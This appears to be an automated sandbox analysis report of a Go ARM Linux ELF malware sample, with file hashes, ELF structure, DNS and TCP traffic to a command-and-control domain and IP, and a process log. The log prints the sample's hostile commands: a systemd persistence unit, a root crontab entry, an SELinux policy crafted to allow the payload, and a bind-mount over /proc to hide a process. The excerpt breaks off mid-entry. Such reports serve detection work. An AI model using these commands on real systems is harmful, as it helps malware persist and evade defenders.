                                                                          SHA-512:DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
                                                                          Malicious:false
                                                                          Preview:[Unit].Description=linux.After=network.target.[Service].Type=forking.ExecStart=/boot/System.mod.ExecReload=/boot/System.mod.ExecStop=/boot/System.mod.[Install].WantedBy=multi-user.target

                                                                          Static File Info

                                                                          General

                                                                          File type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Entropy (8bit):6.05036085544014
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                          File name:linux_arm6.elf
                                                                          File size:5'242'880 bytes
                                                                          MD5:c5f2dde5dca123520549bd745325fa64
                                                                          SHA1:2b154bf7d864b50f746348bc93044e8e939dbee1
                                                                          SHA256:b3f7cb72809a18ea6a45ac6658fac539e2c066184485e041845d2e2f9949125f
                                                                          SHA512:66aa8e660403689f1767899fe5423cecf9fca44c9f3c8df3937b4e6e87c147f6433fd530601d26f8781d8ffb39b26d3230360bf51632ff035913c9dc43e721c5
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          TLSH:38363C4BB8924682C4E4367ABC7D81D473B34EB99B9713666D04FE3C3ABE1990E35314
                                                                          File Content Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.......

                                                                          Static ELF Info

                                                                          ELF header

                                                                          Class:ELF32
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:ARM
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x7ef80
                                                                          Flags:0x5000002
                                                                          ELF Header Size:52
                                                                          Program Header Offset:52
                                                                          Program Header Size:32
                                                                          Number of Program Headers:7
                                                                          Section Header Offset:276
                                                                          Section Header Size:40
                                                                          Number of Section Headers:14
                                                                          Header String Table Index:3

                                                                          Sections

                                                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                          NULL0x00x00x00x00x0000
                                                                          .textPROGBITS0x110000x10000x28dddc0x00x6AX004
                                                                          .rodataPROGBITS0x2a00000x2900000xbe4d60x00x2A008
                                                                          .shstrtabSTRTAB0x00x34e4d80x980x00x0001
                                                                          .typelinkPROGBITS0x35e5700x34e5700x164c0x00x2A008
                                                                          .itablinkPROGBITS0x35fbc00x34fbc00x4780x00x2A008
                                                                          .gosymtabPROGBITS0x3600380x3500380x00x00x2A001
                                                                          .gopclntabPROGBITS0x3600380x3500380x14b1dc0x00x2A008
                                                                          .go.buildinfoPROGBITS0x4b00000x4a00000x1400x00x3WA0016
                                                                          .noptrdataPROGBITS0x4b01400x4a01400x4f3680x00x3WA008
                                                                          .dataPROGBITS0x4ff4a80x4ef4a80x56e00x00x3WA008
                                                                          .bssNOBITS0x504b880x4f4b880x1215c0x00x3WA008
                                                                          .noptrbssNOBITS0x516ce80x506ce80x65880x00x3WA008
                                                                          .note.go.buildidNOTE0x10f9c0xf9c0x640x00x2A004

                                                                          Program Segments

                                                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                          PHDR0x340x100340x100340xe00xe02.25500x4R 0x10000
                                                                          NOTE0xf9c0x10f9c0x10f9c0x640x645.31980x4R 0x4.note.go.buildid
                                                                          LOAD0x00x100000x100000x28eddc0x28eddc5.76870x5R E0x10000.text .note.go.buildid
                                                                          LOAD0x2900000x2a00000x2a00000x20b2140x20b2145.62300x4R 0x10000.rodata .typelink .itablink .gosymtab .gopclntab
                                                                          LOAD0x4a00000x4b00000x4b00000x54b880x6d2706.40280x6RW 0x10000.go.buildinfo .noptrdata .data .bss .noptrbss
                                                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                          LOOS+50415800x00x00x00x00x00.00000x2a00 0x4

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 19:03:35.519948959 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:35.639421940 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:35.639548063 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:35.656377077 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:35.775876045 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:36.886375904 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:36.886565924 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:36.886658907 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:36.886658907 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:36.916268110 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:36.919101954 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:37.035970926 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:37.039033890 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:37.431782007 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:37.432070971 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:38.643611908 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:38.643702984 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:41.650850058 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:41.650985956 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:44.658824921 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:44.659082890 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:47.663258076 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:47.663660049 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:50.670845032 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:50.671286106 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:53.676474094 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:53.676712990 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:56.673768997 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:56.674104929 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:03:59.682755947 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:03:59.682960987 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:02.684015989 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:02.684163094 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:05.699423075 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:05.699666977 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:08.702496052 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:08.702739954 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:11.701560974 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:11.701826096 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:14.716150045 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:14.716402054 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:17.726133108 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:17.726464033 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:20.740746975 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:20.740950108 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:23.756840944 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:23.757097006 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:26.761544943 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:26.761945963 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:29.805244923 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:29.805469036 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:32.809067011 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:32.809252024 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:35.807653904 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:35.807876110 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:38.776087046 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:38.776334047 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:41.791584969 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:41.791965961 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:44.794389963 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:44.794536114 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:47.797725916 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:47.797904015 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:50.803540945 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:50.803761959 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:53.815622091 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:53.815804958 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:56.830775023 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:56.830980062 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:04:59.845607996 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:04:59.845760107 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:05:02.847898006 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:05:02.847970963 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:05:05.859402895 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:05:05.859564066 CET3601660888192.168.2.1493.123.85.138
                                                                          Dec 10, 2024 19:05:11.874501944 CET608883601693.123.85.138192.168.2.14
                                                                          Dec 10, 2024 19:05:11.874919891 CET3601660888192.168.2.1493.123.85.138

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 19:03:34.791929960 CET6007753192.168.2.141.1.1.1
                                                                          Dec 10, 2024 19:03:34.793040991 CET3581953192.168.2.141.1.1.1
                                                                          Dec 10, 2024 19:03:34.930026054 CET53600771.1.1.1192.168.2.14
                                                                          Dec 10, 2024 19:03:34.930789948 CET53358191.1.1.1192.168.2.14
                                                                          Dec 10, 2024 19:03:34.946827888 CET4174653192.168.2.141.1.1.1
                                                                          Dec 10, 2024 19:03:34.950164080 CET3667353192.168.2.141.1.1.1
                                                                          Dec 10, 2024 19:03:35.515270948 CET53366731.1.1.1192.168.2.14
                                                                          Dec 10, 2024 19:03:35.515369892 CET53417461.1.1.1192.168.2.14

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 19:03:34.791929960 CET192.168.2.141.1.1.10xec24Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                          Dec 10, 2024 19:03:34.793040991 CET192.168.2.141.1.1.10xefa1Standard query (0)www.google.com28IN (0x0001)false
                                                                          Dec 10, 2024 19:03:34.946827888 CET192.168.2.141.1.1.10x1fc2Standard query (0)cc.ava9527.cc28IN (0x0001)false
                                                                          Dec 10, 2024 19:03:34.950164080 CET192.168.2.141.1.1.10x9d1eStandard query (0)cc.ava9527.ccA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 19:03:34.930026054 CET1.1.1.1192.168.2.140xec24No error (0)www.google.com142.250.181.68A (IP address)IN (0x0001)false
                                                                          Dec 10, 2024 19:03:34.930789948 CET1.1.1.1192.168.2.140xefa1No error (0)www.google.com28IN (0x0001)false
                                                                          Dec 10, 2024 19:03:35.515270948 CET1.1.1.1192.168.2.140x9d1eNo error (0)cc.ava9527.cc93.123.85.138A (IP address)IN (0x0001)false

                                                                          System Behavior

                                                                          General

                                                                          Start time (UTC):18:03:10
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:/tmp/linux_arm6.elf
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:10
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:10
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:/tmp/linux_arm6.elf
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:/bin/bash -c /etc/32675&
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/32675
                                                                          Arguments:/etc/32675
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/32675
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/sleep
                                                                          Arguments:sleep 60
                                                                          File size:39256 bytes
                                                                          MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/32675
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/opt.services.cfg
                                                                          Arguments:/etc/opt.services.cfg
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/opt.services.cfg
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/opt.services.cfg
                                                                          Arguments:/etc/opt.services.cfg
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:15
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/etc/32675
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:15
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/sleep
                                                                          Arguments:sleep 60
                                                                          File size:39256 bytes
                                                                          MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:service crond start
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl --quiet is-active multi-user.target
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl list-unit-files --full --type=socket
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:14
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/sed
                                                                          Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                          File size:121288 bytes
                                                                          MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:16
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start crond.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:/bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaoff.service;systemctl start quotaoff.service;journalctl -xe --no-pager"
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl daemon-reload
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl enable quotaoff.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start quotaoff.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/journalctl
                                                                          Arguments:journalctl -xe --no-pager
                                                                          File size:80120 bytes
                                                                          MD5 hash:bf3a987344f3bacafc44efd882abda8b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:20
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:20
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:/bin/bash -c "cd /boot;ausearch -c 'System.mod' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:20
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:20
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:20
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:22
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:22
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/bash
                                                                          Arguments:/bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/renice
                                                                          Arguments:renice -20 5488
                                                                          File size:14568 bytes
                                                                          MD5 hash:3686c936ed1df483498266a36871cb5b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/mount
                                                                          Arguments:mount -o bind /tmp/ /proc/5488
                                                                          File size:55528 bytes
                                                                          MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:service cron start
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
